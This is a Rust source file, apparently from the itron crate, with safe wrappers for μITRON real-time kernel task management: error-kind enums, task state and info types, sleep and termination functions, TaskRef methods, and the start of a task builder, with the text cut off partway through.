define_error_kind! {
/// Error type for [`TaskRef::suspend`].
pub enum SuspendError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(any())]
AccessDenied,
/// Bad state.
///
/// - The task is dormant.
/// - The task has a pending termination request.
///
#[cfg(not(feature = "none"))]
BadState,
/// The task is already suspended.
#[cfg(not(feature = "none"))]
QueueOverflow,
}
}
impl ErrorKind for SuspendError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ | abi::E_RASTER => Some(Self::BadState(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_QOVR => Some(Self::QueueOverflow(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`TaskRef::resume`].
pub enum ResumeError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(any())]
AccessDenied,
/// Bad state.
///
/// - The task is not suspended.
///
#[cfg(not(feature = "none"))]
BadState,
}
}
impl ErrorKind for ResumeError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`TaskRef::terminate`].
pub enum TerminateError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
/// Bad state.
///
/// - The task is dormant.
/// - The task is assigned to a processor that is different from the
/// current one (`E_OBJ`, NGKI3481).
///
#[cfg(not(feature = "none"))]
BadState,
/// Bad parameter.
///
/// - The current task cannot be terminated,
///
#[cfg(not(feature = "none"))]
BadParam,
}
}
impl ErrorKind for TerminateError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ILUSE => Some(Self::BadParam(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`TaskRef::raise_termination`].
pub enum RaiseTerminationError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
/// Bad state.
///
/// - The task is dormant.
/// - The task is assigned to a processor that is different from the
/// current one (`E_OBJ`, NGKI3481).
///
#[cfg(not(feature = "none"))]
BadState,
/// Bad state.
///
/// - The current task cannot be terminated,
///
#[cfg(not(feature = "none"))]
BadParam,
}
}
impl ErrorKind for RaiseTerminationError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ILUSE => Some(Self::BadParam(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`sleep`].
pub enum SleepError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
Released,
#[cfg(not(feature = "none"))]
TerminateRequest,
}
}
impl ErrorKind for SleepError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`sleep_timeout`].
pub enum SleepTimeoutError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
Timeout,
#[cfg(not(feature = "none"))]
Released,
#[cfg(not(feature = "none"))]
TerminateRequest,
}
}
impl ErrorKind for SleepTimeoutError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// E_PAR is considered critial, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`delay`].
pub enum DelayError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
Released,
#[cfg(not(feature = "none"))]
TerminateRequest,
}
}
impl ErrorKind for DelayError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// E_PAR is considered critial, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`exit`].
pub enum ExitError {
#[cfg(not(feature = "none"))]
BadContext,
}
}
impl ErrorKind for ExitError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// E_SYS is considered critial, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`disable_termination`].
pub enum DisableTerminationError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for DisableTerminationError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
/// Error type for [`enable_termination`].
pub type EnableTerminationError = DisableTerminationError;
/// The error type returned by [`current`] when the CPU lock state is active,
/// or the current thread is not in a task context.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
pub struct BadContextError(());
define_error_kind! {
/// Error type for [`current_id`].
pub enum CurrentIdError {
/// The CPU lock state is active.
#[cfg(not(feature = "none"))]
BadContext,
}
}
impl ErrorKind for CurrentIdError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`Task::build`].
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub enum BuildError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(any())]
AccessDenied,
/// Ran out of memory or task IDs.
#[cfg(not(feature = "none"))]
OutOfMemory,
/// Bad parameter.
///
/// - The specified stack region overlaps with an existing memory
/// object (NGKI1060, `E_OBJ`).
///
/// - The specified system stack region is not included a kernel-only
/// memory object (NGKI1057, `E_OBJ`).
///
/// - The specified stack size is too small (NGKI1042, `E_PAR`).
///
/// - The specified system stack size is too small (NGKI1044, `E_PAR`).
///
/// - NGKI5108, `E_PAR`.
///
/// - The kernel configuration requires manual stack specification, but
/// the caller did not specify one (NGKI3907, `E_PAR`).
///
/// - The specified stack does not meet target-specific requirements
/// (NGKI1056, `E_PAR`).
///
/// - The specified system stack does not meet target-specific
/// requirements (NGKI1065, `E_PAR`).
///
/// - The caller requested to create a system task, and `sstk` is
/// non-null (NGKI1068, `E_PAR`).
///
/// - The caller requested to create a system task, `sstksz != 0`,
/// and `stk` is non-null (NGKI1071, `E_PAR`).
///
#[cfg(not(feature = "none"))]
BadParam,
}
}
#[cfg(feature = "dcre")]
impl ErrorKind for BuildError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
// `Builder::build` uses `get_pid` to get the current processor and
// coalesces its error code into this error kind type. Thus, this error
// kind type must be able to handle errors from both `acre_tsk` and
// `get_pid`!
match code.get() {
// `E_MACV` is considered critical, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_NOID | abi::E_NOMEM => Some(Self::OutOfMemory(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_PAR => Some(Self::BadParam(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OBJ => Some(Self::BadParam(Kind::from_error_code(code))),
_ => None,
}
}
}
/// Task priority value.
pub type Priority = abi::PRI;
/// Task state returned by [`TaskRef::state`].
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
#[repr(u8)]
pub enum State {
Running = abi::TTS_RUN as u8,
Ready = abi::TTS_RDY as u8,
Waiting = abi::TTS_WAI as u8,
Suspended = abi::TTS_SUS as u8,
WaitingSuspended = abi::TTS_WAS as u8,
Dormant = abi::TTS_DMT as u8,
}
impl State {
#[inline]
unsafe fn from_abi_unchecked(x: abi::STAT) -> Self {
unsafe { core::mem::transmute(x as u8) }
}
}
/// Task information returned by [`TaskRef::info`].
#[derive(Debug, Clone, Copy)]
pub struct Info {
#[cfg(not(feature = "none"))]
raw: abi::T_RTSK,
}
impl Info {
/// Get the task's state.
#[inline]
pub fn state(&self) -> State {
match () {
#[cfg(not(feature = "none"))]
() => unsafe { State::from_abi_unchecked(self.raw.tskstat) },
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// Get the task's current priority.
#[inline]
pub fn current_priority(&self) -> Priority {
match () {
#[cfg(not(feature = "none"))]
() => self.raw.tskpri,
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// Get the task's base priority.
#[inline]
pub fn base_priority(&self) -> Priority {
match () {
#[cfg(not(feature = "none"))]
() => self.raw.tskbpri,
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
// TODO: tskwait
// TODO: wobjid
// TODO: lefttmo
// TODO: actcnt
// TODO: wupcnt
// TODO: raster
// TODO: dister
// TODO: prcid
// TODO: actprc
}
/// `slp_tsk`: Put the current task to sleep.
///
/// The [`TaskRef::wake`] method and this function are semantically analogous to
/// `std::thread::Thread::unpark` and `std::thread::park`, respectively.
#[inline]
#[doc(alias = "slp_tsk")]
#[doc(alias = "park")]
pub fn sleep() -> Result<(), Error<SleepError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::slp_tsk())?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `dly_tsk`: Put the current task to sleep with timeout.
#[inline]
#[doc(alias = "tslp_tsk")]
#[doc(alias = "park_timeout")]
pub fn sleep_timeout(tmo: Timeout) -> Result<(), Error<SleepTimeoutError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::tslp_tsk(tmo.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `dly_tsk`: Delay the current task.
#[inline]
#[doc(alias = "dly_tsk")]
pub fn delay(dur: Duration) -> Result<(), Error<DelayError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::dly_tsk(dur.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ext_tsk`: Terminate the current task.
///
/// This function will not return if it succeeds.
///
/// # Safety
///
/// If the task's stack is reused later, stored local variables are
/// destroyed without running their destructors, violating the [pinning]
/// requirements.
///
/// [pinning]: core::pin
#[inline]
#[doc(alias = "ext_tsk")]
pub unsafe fn exit() -> Error<ExitError> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe { Error::new_unchecked(ErrorCode::new_unchecked(abi::ext_tsk())) },
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `dis_ter`: Disable the termination of the current task by
/// [a termination request].
///
/// [a termination request]: TaskRef::raise_termination
#[inline]
#[doc(alias = "dis_ter")]
pub fn disable_termination() -> Result<(), Error<DisableTerminationError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::dis_ter())?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ena_ter`: Re-enable the termination of the current task by
/// [a termination request].
///
/// [a termination request]: TaskRef::raise_termination
#[inline]
#[doc(alias = "ena_ter")]
pub fn enable_termination() -> Result<(), Error<EnableTerminationError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::ena_ter())?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `sns_ter`: Determine if the termination by [a termination request] is
/// disabled for the current task.
///
/// [a termination request]: TaskRef::raise_termination
#[inline]
#[doc(alias = "sns_ter")]
pub fn is_termination_disabled() -> bool {
match () {
#[cfg(not(feature = "none"))]
() => unsafe { abi::sns_ter() != 0 },
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `get_tid`: Get the currently running task's ID.
#[inline]
#[doc(alias = "get_tid")]
pub fn current_id() -> Result<Option<abi::NonNullID>, Error<CurrentIdError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut out = MaybeUninit::uninit();
Error::err_if_negative(abi::get_tid(out.as_mut_ptr()))?;
Ok(abi::NonNullID::new(out.assume_init()))
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// A borrowed reference to a task.
#[derive(PartialEq, Eq, Clone, Copy)]
pub struct TaskRef<'a> {
id: abi::NonNullID,
_phantom: PhantomData<&'a ()>,
}
impl fmt::Debug for TaskRef<'_> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "Task({})", self.id)
}
}
/// # Object ID conversion
impl TaskRef<'_> {
/// Construct a `TaskRef` from a raw object ID.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
Self {
id,
_phantom: PhantomData,
}
}
/// Get the raw object ID.
#[inline]
pub const fn as_raw(self) -> abi::ID {
self.id.get()
}
/// Get the raw object ID as [`abi::NonNullID`].
#[inline]
pub const fn as_raw_nonnull(self) -> abi::NonNullID {
self.id
}
}
/// # Management
impl TaskRef<'_> {
/// `act_tsk`: Pend an activation request for the task.
#[inline]
#[doc(alias = "act_tsk")]
pub fn activate(self) -> Result<(), Error<ActivateError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::act_tsk(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `mact_tsk`: Pend an activation request for the task, assigning it to
/// the specified processor.
#[inline]
#[doc(alias = "mact_tsk")]
pub fn activate_on(self, processor: Processor) -> Result<(), Error<ActivateOnError>> {
match () {
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
() => unsafe {
Error::err_if_negative(abi::mact_tsk(self.as_raw(), processor.as_raw()))?;
Ok(())
},
#[cfg(not(any(feature = "none", feature = "fmp3", feature = "solid_fmp3")))]
() => {
let Processor::UNIPROCESSOR = processor;
self.activate()
.map_err(|e| unsafe { Error::new_unchecked(e.code()) })
}
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `can_act`: Cancel any pending activation requests for the task.
/// Returns the number of cancelled requests.
#[inline]
#[doc(alias = "can_act")]
pub fn cancel_activate_all(self) -> Result<usize, Error<CancelActivateAllError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let count = Error::err_if_negative(abi::can_act(self.as_raw()))?;
Ok(count as usize)
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `chg_pri`: Change the task's base priority.
#[inline]
#[doc(alias = "chg_pri")]
pub fn set_base_priority(
self,
new_priority: Priority,
) -> Result<(), Error<SetBasePriorityError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::chg_pri(self.as_raw(), new_priority))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `get_pri`: Get the task's priority.
///
/// Use [`TaskRef::info`][] and [`Info::base_priority`][] to get the base
/// priority.
#[inline]
#[doc(alias = "get_pri")]
pub fn priority(self) -> Result<Priority, Error<PriorityError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut pri = MaybeUninit::uninit();
Error::err_if_negative(abi::get_pri(self.as_raw(), pri.as_mut_ptr()))?;
Ok(pri.assume_init())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `mig_tsk`: Change the task's assigned processor.
#[inline]
#[doc(alias = "mig_tsk")]
pub fn migrate(self, processor: Processor) -> Result<(), Error<MigrateError>> {
match () {
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
() => unsafe {
Error::err_if_negative(abi::mig_tsk(self.as_raw(), processor.as_raw()))?;
Ok(())
},
#[cfg(not(any(feature = "none", feature = "fmp3", feature = "solid_fmp3")))]
() => {
let Processor::UNIPROCESSOR = processor;
Ok(())
}
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `del_tsk`: Delete the task.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
#[doc(alias = "del_tsk")]
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub unsafe fn delete(self) -> Result<(), Error<DeleteError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::del_tsk(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `get_tst`: Get the task's state.
#[inline]
#[doc(alias = "get_tst")]
pub fn state(self) -> Result<State, Error<StateError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut pri = MaybeUninit::uninit();
Error::err_if_negative(abi::get_tst(self.as_raw(), pri.as_mut_ptr()))?;
Ok(State::from_abi_unchecked(pri.assume_init()))
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ref_tsk`: Get the task's general information.
#[inline]
#[doc(alias = "ref_tsk")]
pub fn info(self) -> Result<Info, Error<InfoError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut pri = MaybeUninit::uninit();
Error::err_if_negative(abi::ref_tsk(self.as_raw(), pri.as_mut_ptr()))?;
Ok(Info {
raw: pri.assume_init(),
})
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// # Synchronization
impl TaskRef<'_> {
/// `wup_tsk`: Pend a wake up request for the task.
///
/// This method and the [`sleep`] function are semantically analogous to
/// `std::thread::Thread::unpark` and `std::thread::park`, respectively.
/// However, unlike `unpark`, **this method will return
/// `Err(WakeError::QueueOverflow)` if the token is already present.**
#[inline]
#[doc(alias = "wup_tsk")]
#[doc(alias = "unpark")]
pub fn wake(self) -> Result<(), Error<WakeError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::wup_tsk(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `can_wup`: Cancel any wake up requests for the task.
/// Returns the number of cancelled requests.
#[inline]
#[doc(alias = "can_wup")]
pub fn cancel_wake_all(self) -> Result<usize, Error<CancelWakeAllError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let count = Error::err_if_negative(abi::can_wup(self.as_raw()))?;
Ok(count as usize)
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `rel_wai`: Forcibly release the task from waiting.
#[inline]
#[doc(alias = "rel_wai")]
pub fn release_wait(self) -> Result<(), Error<ReleaseWaitError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::rel_wai(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `sus_tsk`: Suspend the task.
#[inline]
#[doc(alias = "sus_tsk")]
pub fn suspend(self) -> Result<(), Error<SuspendError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::sus_tsk(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `rsm_tsk`: Resume the task.
#[inline]
#[doc(alias = "rsm_tsk")]
pub fn resume(self) -> Result<(), Error<ResumeError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::rsm_tsk(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// # Termination
impl TaskRef<'_> {
/// `ter_tsk`: Terminate the task.
///
/// # Safety
///
/// If the task's stack is reused later, stored local variables are
/// destroyed without running their destructors, violating the [pinning]
/// requirements.
///
/// [pinning]: core::pin
#[inline]
#[doc(alias = "ter_tsk")]
pub unsafe fn terminate(self) -> Result<(), Error<TerminateError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::ter_tsk(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ras_ter`: Pend a termination request.
///
/// # Safety
///
/// If the task's stack is reused later, stored local variables are
/// destroyed without running their destructors, violating the [pinning]
/// requirements.
///
/// [pinning]: core::pin
#[inline]
#[doc(alias = "ras_ter")]
pub unsafe fn raise_termination(self) -> Result<(), Error<RaiseTerminationError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::ras_ter(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// Get a reference to the current task.
///
/// This function fails if it's called from an interrupt context or the CPU
/// lock state is active.
pub fn current() -> Result<Current, BadContextError> {
if super::kernel::is_task_context() {
match current_id() {
Ok(id) => Ok(Current {
// Safety: It's allowed to get the current task's `TaskRef`.
// The retrieved `TaskRef` will not outlive the task
// because `Current` is `!Send`.
inner: unsafe { TaskRef::from_raw_nonnull(id.unwrap()) },
_no_send: PhantomData,
}),
Err(e) => match e.kind() {
CurrentIdError::BadContext(_) => Err(BadContextError(())),
},
}
} else {
Err(BadContextError(()))
}
}
/// Represents a reference to the current task. Returned by [`current`].
///
/// This type is `!Send`, so it cannot be sent to other threads. This ensures
/// any `TaskRef`s created from this type do not outlive the referenced task.
#[derive(Debug, Clone, Copy)]
pub struct Current {
inner: TaskRef<'static>,
_no_send: PhantomData<*mut ()>,
}
impl Current {
/// Get the raw object ID.
#[inline]
pub const fn as_raw(&self) -> abi::ID {
self.inner.as_raw()
}
/// Get the raw object ID as [`abi::NonNullID`].
#[inline]
pub const fn as_raw_nonnull(&self) -> abi::NonNullID {
self.inner.as_raw_nonnull()
}
/// Borrow `Current` as [`TaskRef`].
///
/// Use this to perform operations on tasks because most of the methods
/// are implemented on `TaskRef` but not `Current`.
#[inline]
pub const fn as_ref(&self) -> TaskRef<'_> {
self.inner
}
}
#[cfg(feature = "dcre")]
pub use self::owned::*;
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
mod owned {
use super::*;
/// An instance of [`IntoProcessorSet`] specifying all processors.
#[derive(Debug, Default, Clone, Copy, PartialEq, Eq)]
pub struct AllProcessors;
pub use self::processor_set::*;
#[cfg(feature = "solid_fmp3")]
mod processor_set {
use super::*;
use core::convert::TryFrom;
/// The trait implemented by types that can be passed to
/// [`crate::task::Builder::processor_affinity`]. This trait is [sealed].
///
/// [sealed]: https://rust-lang.github.io/api-guidelines/future-proofing.html#sealed-traits-protect-against-downstream-implementations-c-sealed
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub trait IntoProcessorSet: private::Sealed + Sized {
#[doc(hidden)]
fn into_uint_t(self) -> abi::uint_t;
}
impl<T: IntoIterator<Item = Processor>> IntoProcessorSet for T {
#[doc(hidden)]
#[inline]
fn into_uint_t(self) -> abi::uint_t {
self.into_iter()
.fold(0, |st, processor| st | processor.into_uint_t())
}
}
impl IntoProcessorSet for Processor {
#[allow(clippy::unnecessary_cast)] // <https://github.com/rust-lang/rust-clippy/issues/6923>
#[doc(hidden)]
#[inline]
fn into_uint_t(self) -> abi::uint_t {
u32::try_from(self.as_raw() - 1)
.ok()
.and_then(|i| (1 as abi::uint_t).checked_shl(i))
.expect("invalid processor ID")
}
}
impl IntoProcessorSet for AllProcessors {
#[doc(hidden)]
#[inline]
fn into_uint_t(self) -> abi::uint_t {
abi::uint_t::MAX
}
}
}
#[cfg(not(feature = "solid_fmp3"))]
mod processor_set {
use super::*;
/// The trait implemented by types that can be passed to
/// [`crate::task::Builder::processor_affinity`]. This trait is [sealed].
///
/// [sealed]: https://rust-lang.github.io/api-guidelines/future-proofing.html#sealed-traits-protect-against-downstream-implementations-c-sealed
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub trait IntoProcessorSet: private::Sealed + Sized {
#[doc(hidden)]
fn assert_non_empty(self);
}
impl<T: IntoIterator<Item = Processor>> IntoProcessorSet for T {
#[doc(hidden)]
#[inline]
fn assert_non_empty(self) {
assert!(
self.into_iter().next().is_some(),
"affinity processor set is empty"
);
}
}
impl IntoProcessorSet for Processor {
#[doc(hidden)]
#[inline]
fn assert_non_empty(self) {}
}
impl IntoProcessorSet for AllProcessors {
#[doc(hidden)]
#[inline]
fn assert_non_empty(self) {}
}
}
/// Implements [the sealed trait pattern (C-SEALED)].
///
/// [the sealed trait pattern (C-SEALED)]: https://rust-lang.github.io/api-guidelines/future-proofing.html#sealed-traits-protect-against-downstream-implementations-c-sealed
mod private {
use super::*;
pub trait Sealed {}
impl<T: IntoIterator<Item = Processor>> Sealed for T {}
impl Sealed for Processor {}
impl Sealed for AllProcessors {}
}
/// The builder type for [tasks](Task). Created by [`Task::build`].
///
/// Its generic parameters are an implementation detail.
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
#[must_use = "`Builder` creates nothing unless you call `.finish()`"]
pub struct Builder<Start, Stack, InitialPriority> {
start: Start,
stack: Stack,
initial_priority: InitialPriority,
assign_to_current_procesor: bool,
#[cfg(not(feature = "none"))]
raw: abi::T_CTSK,
}
/// Builder field hole types
#[allow(non_camel_case_types)]
#[doc(hidden)]
pub mod builder_hole {
pub struct __start_is_not_specified__;
pub struct __stack_is_not_specified__;
pub struct __initial_priority_is_not_specified__;
}
impl Task {
/// `acre_tsk`: Create a builder for `Task`.
///
/// # Example
///
/// ```rust,no_run
/// use itron::task::Task;
/// let captured_variable = 42u16;
/// let task = Task::build()
/// .start(move || { let _ = captured_variable; })
/// .stack_size(4096)
/// .initial_priority(4)
/// .finish_and_activate()
/// .expect("failed to create a task");
///
/// task.as_ref().wake().expect("failed to send a wake up request to the created task");
///
/// // The created task might be still active, so if we just let `task`
/// // go out of scope, its destructor will panic. `Task::leak` consumes
/// // `Task` and prevents the destructor from running.
/// task.leak();
/// ```
#[inline]
#[doc(alias = "acre_tsk")]
pub fn build() -> Builder<
builder_hole::__start_is_not_specified__,
builder_hole::__stack_is_not_specified__,
builder_hole::__initial_priority_is_not_specified__,
> {
Builder {
start: builder_hole::__start_is_not_specified__,
stack: builder_hole::__stack_is_not_specified__,
initial_priority: builder_hole::__initial_priority_is_not_specified__,
assign_to_current_procesor: true,
